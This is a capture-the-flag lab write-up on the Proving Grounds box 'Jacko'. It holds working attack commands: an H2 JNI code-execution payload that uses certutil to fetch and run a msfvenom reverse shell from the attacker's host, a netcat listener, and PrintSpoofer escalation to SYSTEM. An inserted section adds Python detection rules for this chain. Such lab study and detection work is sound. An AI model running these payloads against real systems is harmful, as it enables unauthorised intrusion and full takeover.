Hi everyone! Today's write-up is on Jacko, a 20-point Windows machine on Proving Grounds. H2 version 1.4.199 has a JNI code execution vulnerability that allows us to transfer a Windows reverse shell to the machine and gain access. SeImpersonatePrivilege is enabled, which can be used for privilege escalation (PE). Let's get started!

Nmap enumeration

kali@kali:~$ sudo nmap -sC -sV -p- 192.168.54.66
Password:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 01:33 EDT
Nmap scan report for 192.168.54.66
Host is up (0.00026s latency).
Not shown: 65529 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
MAC Address: 00:50:56:BF:67:10 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Web enumeration

At port 8082

When accessing http://192.168.54.66:8082:

After clicking on the "Connect" button without entering any password:

We can see that it is actually H2 version 1.4.199. If we search online, we can find a JNI code execution vulnerability for it: https://www.exploit-db.com/exploits/49384

Testing the exploit

I copied and pasted the exploit (I had to switch to my own Kali, as the browser-based Kali in Proving Grounds restricts the number of words that can be copied and pasted). There are a total of 5 SQL queries, of which the 5th is the one that allows us to execute remote commands.

Click on the "Run" button and we can see "whoami" gets executed.

Access machine

Generate win reverse shell

MSFVenom is used to generate a reverse shell. Besides that, we also need to launch an HTTP server with Python3 to host it. Note that only port 445 is allowed for the reverse connection, as a firewall setting (or similar) appears to be blocking the other ports. There may be other ports allowed, but I did not try them. Ports 22, 443 and 8080 were tested and were blocked.

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.78 LPORT=445 -f exe > winshell.exe

kali@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Setup reverse shell listener

Netcat is used to listen at port 445 for the coming reverse shell connection.

kali@kali:~$ sudo nc -lvnp 445
listening on [any] 445 ...

Obtain reverse shell

Using the Remote Code Execution (RCE), transfer winshell.exe to the machine and execute it. Input the following and press the "Run" button.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.78/winshell.exe C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()');

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()');

Your Netcat should obtain a reverse shell.

listening on [any] 445 ...
connect to [192.168.49.78] from (UNKNOWN) [192.168.78.66] 49787
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>

Obtain local.txt flag

C:\Program Files (x86)\H2\service>type C:\Users\Tony\Desktop\local.txt
88a**************************

Privilege escalation

Checking privileges

The full path must be specified for the "whoami" command, as the environment variable PATH does not include "C:\Windows\System32".

C:\Program Files (x86)\H2\service>PATH
PATH=C:\Users\tony\AppData\Local\Microsoft\WindowsApps;

C:\Program Files (x86)\H2\service>C:\Windows\System32\whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Since SeImpersonatePrivilege is enabled, we can use PrintSpoofer: https://github.com/itm4n/PrintSpoofer

Download, transfer and execute PrintSpoofer

In your Kali, download PrintSpoofer:

kali@kali:~$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe

In the reverse shell, transfer PrintSpoofer and run it:

C:\Program Files (x86)\H2\service>C:\Windows\system32\certutil.exe -urlcache -f http://192.168.49.78/PrintSpoofer32.exe C:\Users\Tony\Documents\PrintSpoofer32.exe
...

C:\Program Files (x86)\H2\service>C:\Users\Tony\Documents\PrintSpoofer32.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
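From the defender's side, both stages of this chain (the H2 service spawning certutil/cmd to fetch and run winshell.exe, and PrintSpoofer handing out a SYSTEM cmd.exe from a user's Documents folder) leave a clear process-creation trail. The following is an added example, not part of the original write-up, that runs three simple detections over constructed Sysmon-style Event ID 1 records modelled on this box; the H2 install path and IP are taken from the write-up, while HOST\tony and the event layout are assumptions.

```python
import re

H2_DIR = "c:\\program files (x86)\\h2\\"   # H2 install path seen on the box
LOLBINS = {"cmd.exe", "certutil.exe", "powershell.exe", "wscript.exe"}

# Constructed Sysmon-style process-creation records modelled on the Jacko
# chain above; not real telemetry from the machine. HOST\tony is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://192.168.49.78/winshell.exe "
                    r"C:\Users\Tony\Documents\winshell.exe",
     "ParentImage": r"C:\Program Files (x86)\H2\service\java.exe",
     "User": r"HOST\tony"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c C:\Users\Tony\Documents\winshell.exe",
     "ParentImage": r"C:\Program Files (x86)\H2\service\java.exe",
     "User": r"HOST\tony"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd",
     "ParentImage": r"C:\Users\Tony\Documents\PrintSpoofer32.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\svchost.exe",   # benign SYSTEM child
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the detections that fire on one event."""
    hits = []
    image, parent = basename(ev["Image"]), ev["ParentImage"].lower()
    cmd = ev["CommandLine"].lower()
    # 1. A database service (java.exe under the H2 dir) has no business
    #    launching a shell or a living-off-the-land binary.
    if parent.startswith(H2_DIR) and image in LOLBINS:
        hits.append("h2_service_spawned_lolbin")
    # 2. certutil driven as a downloader: -urlcache with a URL argument.
    if image == "certutil.exe" and "-urlcache" in cmd and re.search(r"https?://", cmd):
        hits.append("certutil_download")
    # 3. A SYSTEM process whose parent lives in a user profile instead of
    #    services.exe: the shape of SeImpersonatePrivilege abuse.
    if ev["User"].upper() == "NT AUTHORITY\\SYSTEM" and parent.startswith("c:\\users\\"):
        hits.append("system_child_of_user_profile_binary")
    return hits

def detect(events):
    """(image, [detections]) for every event that triggered at least one rule."""
    return [(basename(e["Image"]), classify(e)) for e in events if classify(e)]
```

Rule 1 is the cheapest to tune on a real estate: allow-list the few children the H2 service legitimately spawns (usually none) and alert on everything else.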

Obtain proof.txt flag

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is AC2F-6399

 Directory of C:\Users\Administrator\Desktop

07/09/2020  12:10 PM    <DIR>          .
07/09/2020  12:10 PM    <DIR>          ..
04/27/2020  09:11 PM             1,450 Microsoft Edge.lnk
10/30/2021  08:51 PM                34 proof.txt
               2 File(s)          1,484 bytes
               2 Dir(s)   6,955,769,856 bytes free

C:\Users\Administrator\Desktop>type proof.txt
de6**************************

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
